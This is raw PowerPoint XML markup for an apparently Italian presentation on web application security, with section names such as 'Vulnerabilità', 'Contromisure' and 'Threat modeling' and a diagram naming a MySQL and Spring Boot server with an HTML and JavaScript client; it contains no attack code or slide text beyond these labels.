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93"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="351" r:id="rId4"/>
    <p:sldId id="352" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="285" r:id="rId28"/>
    <p:sldId id="286" r:id="rId29"/>
    <p:sldId id="287" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="289" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="329" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="307" r:id="rId43"/>
    <p:sldId id="308" r:id="rId44"/>
    <p:sldId id="305" r:id="rId45"/>
    <p:sldId id="304" r:id="rId46"/>
    <p:sldId id="310" r:id="rId47"/>
    <p:sldId id="311" r:id="rId48"/>
    <p:sldId id="312" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
    <p:sldId id="314" r:id="rId51"/>
    <p:sldId id="315" r:id="rId52"/>
    <p:sldId id="355" r:id="rId53"/>
    <p:sldId id="357" r:id="rId54"/>
    <p:sldId id="358" r:id="rId55"/>
    <p:sldId id="359" r:id="rId56"/>
    <p:sldId id="316" r:id="rId57"/>
    <p:sldId id="317" r:id="rId58"/>
    <p:sldId id="318" r:id="rId59"/>
    <p:sldId id="319" r:id="rId60"/>
    <p:sldId id="320" r:id="rId61"/>
    <p:sldId id="360" r:id="rId62"/>
    <p:sldId id="321" r:id="rId63"/>
    <p:sldId id="323" r:id="rId64"/>
    <p:sldId id="325" r:id="rId65"/>
    <p:sldId id="326" r:id="rId66"/>
    <p:sldId id="327" r:id="rId67"/>
    <p:sldId id="328" r:id="rId68"/>
    <p:sldId id="330" r:id="rId69"/>
    <p:sldId id="331" r:id="rId70"/>
    <p:sldId id="332" r:id="rId71"/>
    <p:sldId id="334" r:id="rId72"/>
    <p:sldId id="335" r:id="rId73"/>
    <p:sldId id="354" r:id="rId74"/>
    <p:sldId id="337" r:id="rId75"/>
    <p:sldId id="338" r:id="rId76"/>
    <p:sldId id="339" r:id="rId77"/>
    <p:sldId id="340" r:id="rId78"/>
    <p:sldId id="341" r:id="rId79"/>
    <p:sldId id="342" r:id="rId80"/>
    <p:sldId id="343" r:id="rId81"/>
    <p:sldId id="344" r:id="rId82"/>
    <p:sldId id="346" r:id="rId83"/>
    <p:sldId id="345" r:id="rId84"/>
    <p:sldId id="347" r:id="rId85"/>
    <p:sldId id="366" r:id="rId86"/>
    <p:sldId id="361" r:id="rId87"/>
    <p:sldId id="362" r:id="rId88"/>
    <p:sldId id="363" r:id="rId89"/>
    <p:sldId id="364" r:id="rId90"/>
    <p:sldId id="367" r:id="rId91"/>
    <p:sldId id="350" r:id="rId9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C255A102-522A-634C-8708-F96951BC2305}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Applicazione" id="{7B48FB45-93EF-244A-823D-2ABF0C269939}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Vulnerabilità" id="{10F22DB1-2029-654E-9C06-6E001E7CC947}">
          <p14:sldIdLst>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="273"/>
            <p14:sldId id="265"/>
            <p14:sldId id="276"/>
            <p14:sldId id="266"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="277"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Demo" id="{32F45267-2857-BA4E-BF3A-1A0C36093FA2}">
          <p14:sldIdLst>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="282"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="292"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Contromisure" id="{FFB87B72-A458-254B-95B7-417C7D9517FC}">
          <p14:sldIdLst>
            <p14:sldId id="296"/>
            <p14:sldId id="298"/>
            <p14:sldId id="329"/>
            <p14:sldId id="297"/>
            <p14:sldId id="300"/>
            <p14:sldId id="299"/>
            <p14:sldId id="302"/>
            <p14:sldId id="307"/>
            <p14:sldId id="308"/>
            <p14:sldId id="305"/>
            <p14:sldId id="304"/>
            <p14:sldId id="310"/>
            <p14:sldId id="311"/>
            <p14:sldId id="312"/>
            <p14:sldId id="313"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="358"/>
            <p14:sldId id="359"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
            <p14:sldId id="318"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
            <p14:sldId id="360"/>
            <p14:sldId id="321"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Analisi statica" id="{5AA87135-6196-EF45-8EA6-2C505A271121}">
          <p14:sldIdLst>
            <p14:sldId id="323"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>
            <p14:sldId id="334"/>
            <p14:sldId id="335"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Analisi dinamica" id="{F81109B5-1B10-EF4C-B6D4-37F8BFB03229}">
          <p14:sldIdLst>
            <p14:sldId id="354"/>
            <p14:sldId id="337"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
            <p14:sldId id="340"/>
            <p14:sldId id="341"/>
            <p14:sldId id="342"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="346"/>
            <p14:sldId id="345"/>
            <p14:sldId id="347"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Threat modeling" id="{680C7112-AB18-5E46-AC8D-E18766F1F485}">
          <p14:sldIdLst>
            <p14:sldId id="366"/>
            <p14:sldId id="361"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Sviluppi futuri" id="{9EF738F3-6A51-0C41-95AC-50548D892104}">
          <p14:sldIdLst>
            <p14:sldId id="367"/>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34"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="134" d="100"/>
          <a:sy n="134" d="100"/>
        </p:scale>
        <p:origin x="264"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5267DF-C7AB-4FCC-A983-A876F3B697A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8F60E56-0E52-45C9-B782-B2C4B1F590E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Server side</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD6CC674-BEC6-4D85-A997-963A3BF58E2F}" type="parTrans" cxnId="{35967813-6B86-4FD5-997E-D41F86BEAA64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF275759-C726-446F-8221-CB2917DF4B35}" type="sibTrans" cxnId="{35967813-6B86-4FD5-997E-D41F86BEAA64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2671DF65-A6A9-44D1-868A-BE017A43A392}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>MySQL</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82D86382-50CD-4909-A07C-CB248439612F}" type="parTrans" cxnId="{656F1E2F-3749-451D-8D51-C3D7AEEC35C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3687014B-D5B1-4474-8C17-C2EAECF84D6F}" type="sibTrans" cxnId="{656F1E2F-3749-451D-8D51-C3D7AEEC35C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94185BFB-1FA8-4760-87F8-E4B4B404EEA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" dirty="0"/>
            <a:t>Spring Boot</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46874B4D-D826-44C1-BADD-FE2B88E8B809}" type="parTrans" cxnId="{D1CD64A3-B297-4E38-83F1-FA13E18C068C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C4F26AE-AE95-478C-801C-951E004BB8A7}" type="sibTrans" cxnId="{D1CD64A3-B297-4E38-83F1-FA13E18C068C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Client side</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F0E57F2-75F3-419D-A39A-A9118F5DE9B6}" type="parTrans" cxnId="{5EB46E7A-A412-4840-B9B7-3324D8537A21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2569F878-C1B5-41F8-B46B-B168FA207FFD}" type="sibTrans" cxnId="{5EB46E7A-A412-4840-B9B7-3324D8537A21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{990D5D22-BEB1-4701-9B3E-5544ED96A679}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>HTML</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{921A9253-7132-4EEF-965D-17078229C386}" type="parTrans" cxnId="{A1623BEF-4745-443E-B12C-274C55F7992C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD28D56B-DD11-4DBA-93A4-AD3EDA369313}" type="sibTrans" cxnId="{A1623BEF-4745-443E-B12C-274C55F7992C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{957E4953-FD3B-4FA1-A9AA-0EB9225310DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Javascript </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80B7ED2E-F36E-42E9-AE6F-F37402981F39}" type="parTrans" cxnId="{B62FA7DA-AB14-4E90-B954-EDBCCD6E2718}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9EDBF02-5C30-45E8-B969-257FDDF1A48E}" type="sibTrans" cxnId="{B62FA7DA-AB14-4E90-B954-EDBCCD6E2718}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB56B919-00F3-4B22-BB05-EB9FD1B3509D}" type="pres">
      <dgm:prSet presAssocID="{325267DF-C7AB-4FCC-A983-A876F3B697A3}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60450517-58F5-4832-A371-3C1BE276BA5B}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E41AAEC-D324-46F2-83D5-C0978BD39C73}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590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C72D3201-2E96-4CE9-B7DA-3A2EF0A4D86C}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C1E4B56-2BA7-475E-AAC9-598C59CABD01}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96D66E9D-CC11-41B8-A3EC-C7F4727FE465}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4B5CBA1-B270-494F-B1C7-9D97B58EBC8B}" type="pres">
      <dgm:prSet presAssocID="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F9BF6B8-7E37-4C7A-9A52-D4969070DF62}" type="pres">
      <dgm:prSet presAssocID="{FF275759-C726-446F-8221-CB2917DF4B35}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C004BB5-7C17-4654-A497-4127DA7B9A8C}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCB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itor"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{5B2ABFCF-7DDE-4608-B73D-FDFFB90C176E}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8AB2834-5278-4EF0-9EBA-8ECFC4CBEF00}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2D83054-ADA4-4F54-826C-86FB323EC145}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B935D0A8-FCC8-472D-AA10-9947401DA2F9}" type="pres">
      <dgm:prSet presAssocID="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7F4AC40C-39A8-4CCA-8A06-08A792F5CE34}" type="presOf" srcId="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" destId="{E8AB2834-5278-4EF0-9EBA-8ECFC4CBEF00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{35967813-6B86-4FD5-997E-D41F86BEAA64}" srcId="{325267DF-C7AB-4FCC-A983-A876F3B697A3}" destId="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" srcOrd="0" destOrd="0" parTransId="{AD6CC674-BEC6-4D85-A997-963A3BF58E2F}" sibTransId="{FF275759-C726-446F-8221-CB2917DF4B35}"/>
    <dgm:cxn modelId="{656F1E2F-3749-451D-8D51-C3D7AEEC35C3}" srcId="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" destId="{2671DF65-A6A9-44D1-868A-BE017A43A392}" srcOrd="0" destOrd="0" parTransId="{82D86382-50CD-4909-A07C-CB248439612F}" sibTransId="{3687014B-D5B1-4474-8C17-C2EAECF84D6F}"/>
    <dgm:cxn modelId="{F40C7240-ECD6-4380-829B-52B00F6348D5}" type="presOf" srcId="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" destId="{3C1E4B56-2BA7-475E-AAC9-598C59CABD01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{5EB46E7A-A412-4840-B9B7-3324D8537A21}" srcId="{325267DF-C7AB-4FCC-A983-A876F3B697A3}" destId="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" srcOrd="1" destOrd="0" parTransId="{0F0E57F2-75F3-419D-A39A-A9118F5DE9B6}" sibTransId="{2569F878-C1B5-41F8-B46B-B168FA207FFD}"/>
    <dgm:cxn modelId="{456A7080-F3FE-401C-9F94-B6B37FE8A786}" type="presOf" srcId="{94185BFB-1FA8-4760-87F8-E4B4B404EEA0}" destId="{D4B5CBA1-B270-494F-B1C7-9D97B58EBC8B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1A52F382-503B-4DE3-BC1F-203874590F45}" type="presOf" srcId="{990D5D22-BEB1-4701-9B3E-5544ED96A679}" destId="{B935D0A8-FCC8-472D-AA10-9947401DA2F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{AF302093-EC26-4ADA-853F-8DA1AA5B6629}" type="presOf" srcId="{957E4953-FD3B-4FA1-A9AA-0EB9225310DA}" destId="{B935D0A8-FCC8-472D-AA10-9947401DA2F9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D1CD64A3-B297-4E38-83F1-FA13E18C068C}" srcId="{28F60E56-0E52-45C9-B782-B2C4B1F590E5}" destId="{94185BFB-1FA8-4760-87F8-E4B4B404EEA0}" srcOrd="1" destOrd="0" parTransId="{46874B4D-D826-44C1-BADD-FE2B88E8B809}" sibTransId="{7C4F26AE-AE95-478C-801C-951E004BB8A7}"/>
    <dgm:cxn modelId="{FAAB1BB8-385F-4464-967C-44A24A8D6F02}" type="presOf" srcId="{2671DF65-A6A9-44D1-868A-BE017A43A392}" destId="{D4B5CBA1-B270-494F-B1C7-9D97B58EBC8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B62FA7DA-AB14-4E90-B954-EDBCCD6E2718}" srcId="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" destId="{957E4953-FD3B-4FA1-A9AA-0EB9225310DA}" srcOrd="1" destOrd="0" parTransId="{80B7ED2E-F36E-42E9-AE6F-F37402981F39}" sibTransId="{C9EDBF02-5C30-45E8-B969-257FDDF1A48E}"/>
    <dgm:cxn modelId="{A1623BEF-4745-443E-B12C-274C55F7992C}" srcId="{0019E5EF-EC07-4D34-BF48-45DC5263BCBE}" destId="{990D5D22-BEB1-4701-9B3E-5544ED96A679}" srcOrd="0" destOrd="0" parTransId="{921A9253-7132-4EEF-965D-17078229C386}" sibTransId="{AD28D56B-DD11-4DBA-93A4-AD3EDA369313}"/>
    <dgm:cxn modelId="{F69F09F2-3B05-4338-9E45-DEBEA0BBE0A5}" type="presOf" srcId="{325267DF-C7AB-4FCC-A983-A876F3B697A3}" destId="{BB56B919-00F3-4B22-BB05-EB9FD1B3509D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E5C3D0E4-E570-4DC0-BBB8-F2E4E819739B}" type="presParOf" srcId="{BB56B919-00F3-4B22-BB05-EB9FD1B3509D}" destId="{60450517-58F5-4832-A371-3C1BE276BA5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{0785C9B2-B0D6-4BF1-AA5C-089756615D3A}" type="presParOf" srcId="{60450517-58F5-4832-A371-3C1BE276BA5B}" destId="{2E41AAEC-D324-46F2-83D5-C0978BD39C73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F99EB929-3454-4C95-AA2F-2468A7AD1298}" type="presParOf" srcId="{60450517-58F5-4832-A371-3C1BE276BA5B}" destId="{C72D3201-2E96-4CE9-B7DA-3A2EF0A4D86C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{76D2629C-16BE-43C4-ADD3-F4CEE5BCD71B}" type="presParOf" srcId="{60450517-58F5-4832-A371-3C1BE276BA5B}" destId="{3C1E4B56-2BA7-475E-AAC9-598C59CABD01}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{DFB8D1A1-62E2-4C5C-9A07-A4B148453AB0}" type="presParOf" srcId="{60450517-58F5-4832-A371-3C1BE276BA5B}" destId="{96D66E9D-CC11-41B8-A3EC-C7F4727FE465}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{54D68182-54D6-4EFA-AC51-F6F9E29EE987}" type="presParOf" srcId="{60450517-58F5-4832-A371-3C1BE276BA5B}" destId="{D4B5CBA1-B270-494F-B1C7-9D97B58EBC8B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{47DA92BB-A326-4394-873A-3A934810A599}" type="presParOf" srcId="{BB56B919-00F3-4B22-BB05-EB9FD1B3509D}" destId="{4F9BF6B8-7E37-4C7A-9A52-D4969070DF62}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1E8A496C-83B0-4F06-BB9E-8819ABC3DC64}" type="presParOf" srcId="{BB56B919-00F3-4B22-BB05-EB9FD1B3509D}" destId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{910DECD1-AA35-413A-9A46-4745B7ACE361}" type="presParOf" srcId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" destId="{5C004BB5-7C17-4654-A497-4127DA7B9A8C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{5554FE9F-259B-4584-BC9D-CE4A824D128F}" type="presParOf" srcId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" destId="{5B2ABFCF-7DDE-4608-B73D-FDFFB90C176E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{8213A7FD-6B1B-4B5E-854C-D83C71838290}" type="presParOf" srcId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" destId="{E8AB2834-5278-4EF0-9EBA-8ECFC4CBEF00}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{84FB3445-27F3-474C-9026-48CF3F88C92D}" type="presParOf" srcId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" destId="{C2D83054-ADA4-4F54-826C-86FB323EC145}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
